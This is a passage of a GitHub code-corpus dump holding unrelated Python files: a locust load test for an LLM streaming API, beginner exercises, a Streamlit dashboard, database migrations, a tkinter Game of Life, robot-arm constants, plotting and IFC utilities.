\"When was George Washington president?\",\n \"Explain to me the difference between nuclear fission and fusion.\",\n \"Give me a list of 5 science fiction books I should read next.\",\n \"Explain the difference between Spark and Ray.\",\n \"Suggest some fun holiday ideas.\",\n \"Tell a joke.\",\n \"What is 2+2?\",\n \"Explain what is machine learning like I am five years old.\",\n \"Explain what is artifical intelligence.\",\n \"How do I make fried rice?\",\n \"What are the most influential punk bands of all time?\",\n \"What are the best places in the world to visit?\",\n \"Which Olympics were held in Australia? What years and what cities?\",\n]\n\nMODELS = [\n # \"amazon/LightGPT\",\n # \"OpenAssistant/falcon-7b-sft-top1-696\",\n \"OpenAssistant/falcon-40b-sft-top1-560\",\n # \"RWKV/rwkv-raven-14b\",\n]\n\nBACKEND_TOKEN = os.getenv(\"AVIARY_TOKEN\", \"\")\n\n\nclass User(HttpUser):\n wait_time = constant(0)\n\n def query(self, max_iterations: Optional[int] = None):\n prompt = random.choice(PROMPTS)\n model = random.choice(MODELS)\n model = model.replace(\"/\", \"--\")\n with self.client.post(\n f\"/stream/{model}\",\n json={\n \"prompt\": prompt,\n \"parameters\": {\"max_new_tokens\": 512},\n },\n headers={\"Authorization\": f\"Bearer {BACKEND_TOKEN}\"},\n timeout=120,\n catch_response=True,\n stream=True,\n ) as response:\n try:\n if response.status_code != 200:\n raise RuntimeError(\n f\"Got non-200 response code: {response.status_code}.\"\n )\n else:\n chunks = []\n iteration = 0\n time_since_last_chunk = time.monotonic()\n for chunk in response.iter_lines(\n chunk_size=None, decode_unicode=True\n ):\n iteration += 1\n if iteration == max_iterations:\n # Disconnect request\n break\n chunk = chunk.strip()\n if chunk:\n if time.monotonic() - time_since_last_chunk > 120:\n raise RuntimeError(\n \"* Chunk timeout.\" f\"\\n* Chunks so far: {chunks}\"\n )\n time_since_last_chunk = time.monotonic()\n chunks.append(chunk)\n data = json.loads(chunk)\n if data.get(\"error\"):\n raise RuntimeError(\n f\"* Data chunk contained an error: {data}\"\n f\"\\n* Chunks so far: {chunks}\"\n )\n except Exception as e:\n response.failure(f\"Exception: {e}\")\n response.success()\n return response\n\n @task(10)\n def query_and_consume(self):\n \"\"\"Emulates a user that consumes an entire request.\"\"\"\n self.query(max_iterations=None)\n\n @task(1)\n def query_and_skip(self):\n \"\"\"Emulates a disconnect while the response is streaming.\"\"\"\n self.query(max_iterations=2) # Disconnect after two iterations\n","repo_name":"morhidi/ray-llm","sub_path":"loadtest/canceling.py","file_name":"canceling.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"} +{"seq_id":"32475454606","text":"#Sorting\r\n\r\n\"\"\"\r\nGiven an array, a, of size n distinct elements, sort the array in ascending order using the Bubble Sort algorithm above. 
\r\nOnce sorted, print the following 3 lines:\r\n\r\n>>Array is sorted in numSwaps swaps, where numSwaps is the number of swaps that took place.\r\n>>First Element: firstElement, where firstElement is the first element in the sorted array.\r\n>>Last Element: lastElement, where lastElement is the last element in the sorted array.\r\n\r\nSample Input::\r\n3\r\n1 2 3\r\n\r\nSample Output::\r\nArray is sorted in 0 swaps.\r\nFirst Element: 1\r\nLast Element: 3\r\n\r\n\"\"\"\r\n\r\n#!/bin/python3\r\n\r\nimport sys\r\n\r\nn = int(input().strip())\r\na = list(map(int, input().strip().split(' ')))\r\n\r\nnumSwaps=0\r\n\r\nfor i in range(n):\r\n\tfor j in range(n-1):\r\n\t\tif a[j]>a[j+1]:\r\n\t\t\ttemp=a[j]\r\n\t\t\ta[j]=a[j+1]\r\n\t\t\ta[j+1]=temp\r\n\t\t\tnumSwaps+=1\r\n\r\nprint('Array is sorted in',numSwaps,'swaps.')\r\nprint('First Element:',a[0])\r\nprint('Last Element:',a[-1])\r\n\r\n","repo_name":"SushantBabu97/HackerRank_30Days_Python_Challenge-","sub_path":"Day20.py","file_name":"Day20.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"70038548071","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport plotly.express as px\nfrom plotly.subplots import make_subplots\nimport plotly.graph_objects as go\nimport matplotlib.pyplot as plt\n\n\n'''We can display the text in different ways. Streamlit allows you to write the title, header, and also supports various functions.\n\nst.title()- to set the title\nst.text() to write the description for the particular graph\nst.markdown() to display text as markdown\nst.latex() to display the mathematical expressions in the dashboard.\nst.write() helps to display everything such as plotly graph, dataframe, functions, model, etc.\nst.sidebar() is used for displaying data on the sidebar.\nst.dataframe() to display the data frame\nst.map() to display the map in just a single line code etc'''\n\n\nst.title(\"Covid_19 Dashboard For India\")\nst.markdown(\"The dashboard will visualize the Covid_19 Situation in India\")\nst.markdown(\"Coronavirus disease (COVID_19) is an infectious disease caused by a newly discovered coronavirus. Most people infected with the COVID-19 virus will experience mild to moderate respiratory illness and recover without requiring special treatment.’. 
This app gives you the real-time impact analysis of Confirmed, Deaths, active, and recovered cases of COVID-19 \")\nst.sidebar.title(\"Visualization Selector\")\nst.sidebar.markdown(\"Select the Charts/Plots accordingly:\")\n \n\n\n\n\ndef load_data():\n data=pd.read_csv(\"covid_data.csv\")\n return data\n\ncovid19_data=load_data()\n\n\nst.sidebar.checkbox(\"Show Analysis by State\", True, key=1)\nselect = st.sidebar.selectbox('Select a State',covid19_data['continent'])\n\n#get the state selected in the selectbox\nstate_data = covid19_data[covid19_data['continent'] == select]\nselect_status = st.sidebar.radio(\"Covid-19 patient's status\", ('Confirmed',\n'Active', 'Recovered', 'Deceased'))\n\n\n\ndef get_total_dataframe(dataset):\n total_dataframe = pd.DataFrame({\n 'Status':['Confirmed', 'Recovered', 'Deaths','Active'],\n 'Number of cases':(dataset.iloc[0]['confirmed'],\n dataset.iloc[0]['recovered'], \n dataset.iloc[0]['deaths'],dataset.iloc[0]['active'])})\n return total_dataframe\n\nstate_total = get_total_dataframe(state_data)\n\nif st.sidebar.checkbox(\"Show Analysis by State\", True, key=2):\n st.markdown(\"## **State level analysis**\")\n st.markdown(\"### Overall Confirmed, Active, Recovered and \" +\n \"Deceased cases in %s yet\" % (select))\n if not st.checkbox('Hide Graph', False, key=1):\n state_total_graph = px.bar(\n state_total, \n x='Status',\n y='Number of cases',\n labels={'Number of cases':'Number of cases in %s' % (select)},\n color='Status')\n st.plotly_chart(state_total_graph)","repo_name":"anmol2806/Streamlit_practice","sub_path":"streamlit/st3.py","file_name":"st3.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"8991421138","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('courses', '0003_auto_20170509_0036'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='course',\n name='about',\n field=models.TextField(verbose_name='Sobre o Curso', blank=True, default=1),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='course',\n name='description',\n field=models.TextField(verbose_name='Descrição Simples', blank=True),\n ),\n migrations.AlterField(\n model_name='course',\n name='start_date',\n field=models.DateField(verbose_name='Data de Inicio', null=True, blank=True),\n ),\n ]\n","repo_name":"MarcusWiilo/Django-Aplications","sub_path":"pro_final/pro_final/courses/migrations/0004_auto_20170509_1940.py","file_name":"0004_auto_20170509_1940.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"29356878519","text":"import tkinter as tk\nimport numpy as np\nfrom tkinter import filedialog as fd\n\nwin = tk.Tk()\n\n\nWIDTH = 500\nHEIGHT = 500\nvs = 10\nabs = vs\n#cells = []\ncells = np.zeros((WIDTH//vs, HEIGHT//vs), dtype = int) #dvojrozmerný zoznam\ncells_new = np.zeros((WIDTH//vs, HEIGHT//vs), dtype = int)\nprint(cells)\n\ndef getne(x,y):\n total = 0\n if x > 0:\n total += cells[x-1, y]\n if x > 0 and y > 0:\n total += cells[x-1, y-1]\n if y > 0:\n total += cells[x, y-1]\n if x < (WIDTH//abs-1) and y < (HEIGHT//abs-1):\n total += cells[x+1, y+1]\n if x > 0 and y < (HEIGHT//abs-1):\n total += cells[x-1, y+1]\n if y < (HEIGHT//abs-1):\n total += cells[x, y+1]\n if x < (WIDTH//abs-1):\n total += cells[x+1, y]\n 
if y > 0 and x < (WIDTH//abs-1):\n total += cells[x+1, y-1]\n return total\n\n\ndef recalculate(): # počítame počet susedných buniek\n global cells, cells_new\n #prepočet - v dvoch cykloch chodím po bunkách a pýtam sa koľko majú susedov\n for y in range(HEIGHT//abs):\n for x in range(WIDTH//abs):\n temp = getne(x,y)\n if temp == 2 and cells[x,y] == 1:\n cells_new[x,y] = 1\n if temp == 3:\n cells_new[x,y] = 1\n if temp < 2 or temp > 3:\n cells_new[x,y] = 0\n cells = cells_new.copy()\n canvas.delete(\"all\")\n create_stage()\n redraw_cells()\n\ndef slider_changed(e):\n global vs\n print(slider.get())\n canvas.delete(\"all\") #vymaž canvas - vymaže všetko čo je na canvase\n vs = slider.get() #zoberie hodnotu slidera a dá ho do premennej vs\n create_stage() #vykresli mriežku\n redraw_cells()\n\n\ndef create_cells(e):\n global cells\n tx = e.x//vs\n ty = e.y//vs\n x = (tx)*vs\n y = (ty)*vs\n #cells.append(canvas.create_oval(x+5,y+5,x+vs-5,y+vs-5,fill=\"yellow\")) #máme idečka v cells\n canvas.create_rectangle(x,y,x+vs,y+vs,fill=\"yellow\")\n cells[tx,ty]=1\n print(getne(tx,ty))\n #print(cells)\n\ndef redraw_cells():\n # prechádzame cell a ak tam je 1 vykreslia bunku na prislušnom mieste a rozmeroch\n for x in range(WIDTH//vs):\n for y in range(HEIGHT//vs):\n if cells[x,y] == 1:\n canvas.create_rectangle(x*vs,y*vs,(x+1)*vs,(y+1)*vs, fill = \"yellow\")\n\ndef create_stage():\n for x in range(WIDTH//vs):\n canvas.create_line(x*vs,0,x*vs,HEIGHT)\n for y in range(HEIGHT//vs):\n canvas.create_line(0,y*vs,WIDTH,y*vs)\n\ndef open_file():\n #ak je tam jedna hod ju do cells a vykresli cells\n global cells, cells_new\n zoz = []\n poc = 0\n filename = fd.askopenfilename()\n f = open(filename,\"r\")\n for i in f:\n for j in i.split():\n zoz.append(j)\n for m in zoz:\n for n in m:\n poc += 1\n if poc < 2500: # 50*50\n for o in range(len(zoz)): #cyklus sa zopakuje toľkokrát, koľko je dlžka zoznamu\n for p in range(len(zoz[p])):\n print(zoz[o][p])\n if zoz[o][p] == \"1\": #ak zoznam na tom mieste sa rovná 1 tak aj bunka sa budú rovnať 1 (vytvorí sa)\n cells_new[o, p] = 1\n else:\n cells_new[o, p] = 0\n cells = cells_new.copy()\n canvas.delete(\"all\")\n create_stage()\n redraw_cell()\n else:\n print(\"Tvoj súbor je príliš veľký\")\n\ndef opakovanie():\n if button2.config(\"text\")[-1] == \"STOP\": #ak je tlačidlo na tejto pozícii tak sa spustí recalculate\n recalculate()\n win.after(500, opakovanie) # potom sa 500 milisekúnd obnocí canvas\n #print(button2.config(\"text\")[-1])\n\ndef change():\n if button2.config(\"text\")[-1] == \"ŠTART\": #ak je tlačidlo na tejto pozícii tak po ďalšom kliknutí sa zmení\n button2.config(text = \"STOP\")\n opakovanie() # a znovu sa spustí funkcia opakovanie\n else:\n button2.config(text = \"ŠTART\")\n\ncanvas = tk.Canvas(width=WIDTH, height=HEIGHT, bg=\"white\")\ncanvas.pack()\n\nslider = tk.Scale(win, from_=10, to=50, orient=\"horizontal\", command = slider_changed, length = 500) #https://python-course.eu/tkinter/sliders-in-tkinter.php\nslider.pack()\n\nbutton = tk.Button(win, text = \"ĎALŠIA GENERÁCIA\", command = recalculate)\nbutton.pack(side = tk.RIGHT)\n\nbutton1 = tk.Button(win, text = \"OTVOR SÚBOR\", command = open_file)\nbutton1.pack(side=tk.LEFT)\n\nbutton2 = tk.Button(win, text = \"ŠTART\", command = change)\nbutton2.pack(side=tk.BOTTOM)\n\ncreate_stage()\ncanvas.bind(\"\",create_cells)\n\nwin.mainloop()\n","repo_name":"1Viki1/Game-of-life","sub_path":"Game of life .py","file_name":"Game of life 
.py","file_ext":"py","file_size_in_byte":4565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"36396121534","text":"\"\"\"empty message\n\nRevision ID: 516c21ea7d87\nRevises: bfebc2d5c719\nCreate Date: 2022-07-02 18:10:05.689033\n\n\"\"\"\nimport sqlalchemy_utils\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '516c21ea7d87'\ndown_revision = 'bfebc2d5c719'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('metric2', sa.Column('nb_proton_premium', sa.Float(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('metric2', 'nb_proton_premium')\n # ### end Alembic commands ###\n","repo_name":"simple-login/app","sub_path":"migrations/versions/2022_070218_516c21ea7d87_.py","file_name":"2022_070218_516c21ea7d87_.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":4235,"dataset":"github-code","pt":"71"} +{"seq_id":"13762547710","text":"Lista = []\ncontinuar=True\nrepeticion=0\nwhile continuar==True:\n nombre = input(\"ingrese el nombre que desee: \")\n if nombre==\"\":# esta solo en comillas refiriendoce a que le dio enter sn ingresar nada\n continuar=False\n else:\n Lista.append(nombre)#si igreso un nombre entonces continua\nfor item in Lista:\n if Lista.count(item)>1:#count cuenta las veces que pusiste un valor en una lista, si se coloco un valor + de una vez la repeticion se le sumara uno \n repeticion+=1\nprint(Lista)\nprint(\"Se repito un nombre un total de :\",repeticion,\"veces\")","repo_name":"Francis318/Practica1_back","sub_path":"Practica10.py","file_name":"Practica10.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"72957329190","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"tensorflow-fewshot\",\n version=\"0.0.3\",\n author=\"Aymeric QUESNE\",\n author_email=\"aymeric.quesne@octo.com\",\n description=\"A Python package for few shot learning training and inference in computer vision using Tensorflow.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/aymericq/tensorflow-fewshot\",\n packages=setuptools.find_packages(),\n install_requires=[\n \"numpy>=1.19.1\",\n \"tensorflow>=2.2.0\",\n \"matplotlib>=3.3.0\"\n ],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n)","repo_name":"aymericq/tensorflow-fewshot","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"35711226020","text":"#! 
/usr/bin/python3\nimport sys\nimport os\nimport binascii\nimport pdb\n\npaths = [\n '',\n '/nic',\n '/dol/',\n '/dol/third_party'\n]\n\nws_top = os.path.dirname(sys.argv[0]) + '/../../../'\nws_top = os.path.abspath(ws_top)\nfor path in paths:\n fullpath = ws_top + path\n print(\"Adding Path: %s\" % fullpath)\n sys.path.insert(0, fullpath)\n\nimport infra.engine.comparators as crs\nimport infra.factory.scapyfactory as scapyfactory\n\nfrom infra.penscapy.penscapy import *\nfrom infra.common.logging import logger\n\nlogger.SetLoggingLevel(7)\n\na = Ether()/IP()/UDP(sport=49000)\nipf = Ipfix()\nv4rec = IpfixRecord()/IpfixRecordIpv4Data()\nv6rec = IpfixRecord()/IpfixRecordIpv6Data()\nethrec = IpfixRecord()/IpfixRecordNonIpData()\n\nrecords = []\nrecords.append(IpfixRecord(bytes(ethrec)))\nrecords.append(IpfixRecord(bytes(v6rec)))\nrecords.append(IpfixRecord(bytes(v4rec)))\n\nipf[Ipfix].records = records\n\na = a/ipf\na.show2(indent = 0)\nhexdump(a)\n\nnewpkt = Ether(bytes(a))\nnewpkt.show(indent = 0)\n","repo_name":"ccdxc/sw","sub_path":"dol/ut/engine/ipfix.py","file_name":"ipfix.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"23083542883","text":"import devices.base.constants\n\n\nNUMBER_INPUTS: int = 4\nDEVICE_TYPE = \"DOBT\"\nSTATUS_KEY = devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + 'status'\nSUCTION_STATUS_KEY = devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + 'suction'\nINPUT_PREFIX = \"arm_\"\nX_AXIS_SUFFIX = '_x_mm'\nY_AXIS_SUFFIX = '_y_mm'\nZ_AXIS_SUFFIX = '_z_mm'\nEFFECTOR_ANGLE_SUFFIX = '_effec_ang_deg'\nTARGET_AXIS_SUFFIX = '_target'\nRAW_AXIS_SUFFIX = '_raw'\nAXES = (X_AXIS_SUFFIX, Y_AXIS_SUFFIX, Z_AXIS_SUFFIX, EFFECTOR_ANGLE_SUFFIX)\nTHETA_SUFFIX = '_theta'\nDELTA_X_SUFFIX = '_dx'\nDELTA_Y_SUFFIX = '_dy'\nZ_OFFSET_SUFFIX = '_dz'\n\nMM_XY_MAX = 328\nMM_XY_MIN = 111\n\nMM_MAX_SQ = MM_XY_MAX ** 2\nMM_MIN_SQ = MM_XY_MIN ** 2\n\nALL_IN_POSITION = 15\nOUT_OF_POSITION = 0\n\nALL_SUCTION_OFF = 0\n\nMINIMUM_VELOCITY = 100\nMAXIMUM_VELOCITY = 1000\n\nBASE = dict(\n type=DEVICE_TYPE,\n number_icons=4,\n number_decks=4,\n _number_robot_inputs=NUMBER_INPUTS,\n)\n\nBASE_DTYPES = dict(\n _number_robot_inputs=int.__name__,\n)\n\nBASE.update({\n STATUS_KEY: ALL_IN_POSITION,\n SUCTION_STATUS_KEY: ALL_SUCTION_OFF,\n})\n\nBASE_DTYPES.update({\n STATUS_KEY: int.__name__,\n SUCTION_STATUS_KEY: int.__name__,\n})\n\nfor i in range(0, NUMBER_INPUTS):\n BASE.update({\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + X_AXIS_SUFFIX: 0,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + Y_AXIS_SUFFIX: 0,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + Z_AXIS_SUFFIX: 0,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + EFFECTOR_ANGLE_SUFFIX: 0,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + TARGET_AXIS_SUFFIX + X_AXIS_SUFFIX: 0,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + TARGET_AXIS_SUFFIX + Y_AXIS_SUFFIX: 0,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + TARGET_AXIS_SUFFIX + Z_AXIS_SUFFIX: 0,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + TARGET_AXIS_SUFFIX + EFFECTOR_ANGLE_SUFFIX: 0,\n INPUT_PREFIX + str(i) + RAW_AXIS_SUFFIX + X_AXIS_SUFFIX: 0,\n INPUT_PREFIX + str(i) + RAW_AXIS_SUFFIX + Y_AXIS_SUFFIX: 0,\n INPUT_PREFIX + str(i) + RAW_AXIS_SUFFIX + 
Z_AXIS_SUFFIX: 0,\n INPUT_PREFIX + str(i) + THETA_SUFFIX: 0,\n INPUT_PREFIX + str(i) + DELTA_X_SUFFIX: 0,\n INPUT_PREFIX + str(i) + DELTA_Y_SUFFIX: 0,\n INPUT_PREFIX + str(i) + DELTA_Y_SUFFIX: 0,\n INPUT_PREFIX + str(i) + Z_OFFSET_SUFFIX: 0,\n })\n BASE_DTYPES.update({\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + X_AXIS_SUFFIX: str.__name__,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + Y_AXIS_SUFFIX: str.__name__,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + Z_AXIS_SUFFIX: str.__name__,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + EFFECTOR_ANGLE_SUFFIX: str.__name__,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + TARGET_AXIS_SUFFIX + X_AXIS_SUFFIX: str.__name__,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + TARGET_AXIS_SUFFIX + Y_AXIS_SUFFIX: str.__name__,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + TARGET_AXIS_SUFFIX + Z_AXIS_SUFFIX: str.__name__,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + TARGET_AXIS_SUFFIX + EFFECTOR_ANGLE_SUFFIX: str.__name__,\n INPUT_PREFIX + str(i) + RAW_AXIS_SUFFIX + X_AXIS_SUFFIX: str.__name__,\n INPUT_PREFIX + str(i) + RAW_AXIS_SUFFIX + Y_AXIS_SUFFIX: str.__name__,\n INPUT_PREFIX + str(i) + RAW_AXIS_SUFFIX + Z_AXIS_SUFFIX: str.__name__,\n INPUT_PREFIX + str(i) + THETA_SUFFIX: float.__name__,\n INPUT_PREFIX + str(i) + DELTA_X_SUFFIX: float.__name__,\n INPUT_PREFIX + str(i) + DELTA_Y_SUFFIX: float.__name__,\n INPUT_PREFIX + str(i) + Z_OFFSET_SUFFIX: float.__name__,\n })\n\nBASE = {**devices.base.constants.BASE, **BASE}\nBASE_DTYPES = {**devices.base.constants.BASE_DTYPES, **BASE_DTYPES}\n\nDISPLAY_NAME = \"Dobot Arm (\" + DEVICE_TYPE + \")\"\n\nCATEGORY = \"Robots\"\n\nMOVE_JUMP_MODE = 0\nMOVE_JOINT_MODE = 1\nMOVE_LINEAR_MODE = 2\n\nNUMBER_DECKS = 4\n\nX_GRID_SIZE_MM = 35.\nY_GRID_SIZE_MM = 35.\n\n# center of square\nA1_X_MM = -280.0\nA1_Y_MM = -152.5\n\n# center of square\nI14_X_MM = 0.\nI14_Y_MM = 302.5\n\n# center of square\nQ2_X_MM = 280.\nQ2_Y_MM = -117.5\n\nDECK_GENERATOR = (\n (\"A\", (2, 9)),\n (\"B\", (1, 10)),\n (\"C\", (1, 11)),\n (\"D\", (2, 12)),\n (\"E\", (9, 13)),\n (\"F\", (10, 13)),\n (\"G\", (10, 14)),\n (\"H\", (10, 14)),\n (\"I\", (10, 14)),\n (\"J\", (10, 14)),\n (\"K\", (10, 14)),\n (\"L\", (10, 13)),\n (\"M\", (9, 13)),\n (\"N\", (2, 12)),\n (\"O\", (1, 11)),\n (\"P\", (1, 10)),\n (\"Q\", (2, 9)),\n)\n\n\nDEFAULT_THETA = 0\nDEFAULT_DELTA_X = 0\nDEFAULT_DELTA_Y = 0\n\ndel i\n","repo_name":"aqueductfluidics/example_projects","sub_path":"devices/aqueduct/dobt/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"69945838950","text":"#!/usr/bin/python\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nfrom plot.plotting_utilities import *\n\nhatces = ['x', '\\\\', '/']\ncolors = ['.25', '.5', '.75']\n\nhome = '/afs/cern.ch/work/k/kiliakis/git/cpu-gpu-bench/'\nres_file = home + 'results/fftconvolve/matrixconvolve-bench-v2.csv'\nimages_dir = home + 'results/fftconvolve/'\nimage_name = 'matrixconvolve-bench-v3.pdf'\n\ny_label = 'Normalized Thoughput'\nx_label = 'Signal Size'\n# plot_title = 'FFT Convolution'\n# plot_title = 'lin_interp_kick'\ntitle = 'Matrix FFT Convolution'\ngrouping = ['function']\nprefixes = ['']\nkeeponly = ['n_points', 
'turn_time']\nx_lims = []\ny_lims = []\n\nnames = {'matrixconvolve_cpu_v2': 'CPU Complex Convolution',\n 'matrixconvolve_cpu_v0': 'CPU Real Convolution',\n 'matrixconvolve_gpu_v1': 'Tesla K20X Complex Convolution',\n 'matrixconvolve_gpu_p100': 'Pascal P100 Complex Convolution'}\n\nopacity = 0.85\nwidth = 0.35\n# start = -width/2\nstart = 0\n\nshow = 0\n\nif __name__ == '__main__':\n\n data = np.genfromtxt(res_file, dtype=str)\n header = data[0].tolist()\n data = data[1:]\n all_plots = group_by(header, data, grouping, prefixes)\n # version = file.split('.csv')[0]\n all_plots = keep_only(header, all_plots, keeponly)\n print(all_plots)\n\n plt.figure()\n plt.grid(True, which='major', alpha=0.5)\n # plt.tick_params(labelright=True)\n plt.xlabel(x_label)\n if(x_lims):\n plt.xlim(x_lims)\n if(y_lims):\n plt.ylim(y_lims)\n\n plt.title(title)\n plt.ylabel(y_label)\n\n normalize = np.array(all_plots['matrixconvolve_gpu_v1'][1], float)\n\n for plot_name, plots in all_plots.items():\n if 'gpu' not in plot_name:\n continue\n N = len(plots[0])+1\n ind = np.linspace(0, N, N)\n # plt.figure(figsize=(6, 3))\n\n # define the starting position and the way the bars will be arranged\n\n # plots.sort(key=lambda a: a[0])\n label = plot_name\n if label in names:\n label = names[label]\n x = np.array(plots[0], dtype=int)\n y = normalize / np.array(plots[1], dtype=float)\n y = np.append(y, [np.mean(y)])\n p = plt.bar(ind + start, y, width, label=label, alpha=opacity)\n autolabel(plt.gca(), p, rounding=2, fontsize=8)\n start += width\n x = [human_format(i) for i in x]\n plt.xticks(ind+width/2, x + ['Average'])\n\n # normalize = np.array(all_plots['matrixconvolve_cpu_v2'][1], float)\n # label = 'P100 / CPU Complex'\n # y = normalize / np.array(all_plots['matrixconvolve_gpu_p100'][1], float)\n # y = np.append(y, [np.mean(y)])\n # p = plt.bar(ind + start - width, y, width, label=label, alpha=opacity)\n\n # autolabel(plt.gca(), p, rounding=2, fontsize=8.5)\n\n plt.legend(loc='center left', fancybox=True, framealpha=0.5, fontsize=10,\n bbox_to_anchor=(0., 0.6))\n plt.tight_layout()\n if show:\n plt.show()\n else:\n plt.savefig(images_dir + image_name, dpi=300)\n plt.close()\n\n # autolabel(simple)\n # autolabel(batched)\n","repo_name":"kiliakis/cuda-fft-convolution","sub_path":"scripts/plots/plot_bars.py","file_name":"plot_bars.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"23926247253","text":"import ifcopenshell\nimport ifcopenshell.api\n\n\nclass Usecase:\n def __init__(self, file, related_object=None):\n \"\"\"Unassigns a type of an occurrence\n\n :param related_object: The IfcElement occurrence.\n :type related_object: ifcopenshell.entity_instance.entity_instance\n :return: None\n :rtype: None\n\n Example:\n\n .. code:: python\n\n # A furniture type. This would correlate to a particular model in a\n # manufacturer's catalogue. Like an Ikea sofa :)\n furniture_type = ifcopenshell.api.run(\"root.create_entity\", model,\n ifc_class=\"IfcFurnitureType\", name=\"FUN01\")\n\n # An individual occurrence of a that sofa.\n furniture = ifcopenshell.api.run(\"root.create_entity\", model, ifc_class=\"IfcFurniture\")\n\n # Assign the furniture to the furniture type.\n ifcopenshell.api.run(\"type.assign_type\", model, related_object=furniture, relating_type=furniture_type)\n\n # Change our mind. 
Maybe it's a different type?\n ifcopenshell.api.run(\"type.unassign_type\", model, related_object=furniture)\n \"\"\"\n self.file = file\n self.settings = {\"related_object\": related_object}\n\n def execute(self):\n if self.file.schema == \"IFC2X3\":\n is_typed_by = None\n is_defined_by = self.settings[\"related_object\"].IsDefinedBy\n for rel in is_defined_by:\n if rel.is_a(\"IfcRelDefinesByType\"):\n is_typed_by = rel\n else:\n is_typed_by = self.settings[\"related_object\"].IsTypedBy\n if is_typed_by:\n is_typed_by = is_typed_by[0]\n\n if is_typed_by:\n related_objects = list(is_typed_by.RelatedObjects)\n related_objects.remove(self.settings[\"related_object\"])\n if related_objects:\n is_typed_by.RelatedObjects = related_objects\n ifcopenshell.api.run(\"owner.update_owner_history\", self.file, **{\"element\": is_typed_by})\n else:\n self.file.remove(is_typed_by)\n","repo_name":"IfcOpenShell/IfcOpenShell","sub_path":"src/ifcopenshell-python/ifcopenshell/api/type/unassign_type.py","file_name":"unassign_type.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":1412,"dataset":"github-code","pt":"71"} +{"seq_id":"23177378061","text":"from django.contrib import admin\nfrom django.contrib.gis.admin import OSMGeoAdmin\nfrom rgd.admin.mixins import (\n MODIFIABLE_FILTERS,\n TASK_EVENT_FILTERS,\n TASK_EVENT_READONLY,\n GeoAdminInline,\n _FileGetNameMixin,\n reprocess,\n)\nfrom rgd_fmv.models import FMV, FMVMeta\n\n\nclass FMVMetaInline(GeoAdminInline):\n model = FMVMeta\n fk_name = 'fmv_file'\n list_display = (\n 'pk',\n 'fmv_file',\n 'modified',\n 'created',\n )\n readonly_fields = (\n 'modified',\n 'created',\n 'fmv_file',\n )\n\n\n@admin.register(FMV)\nclass 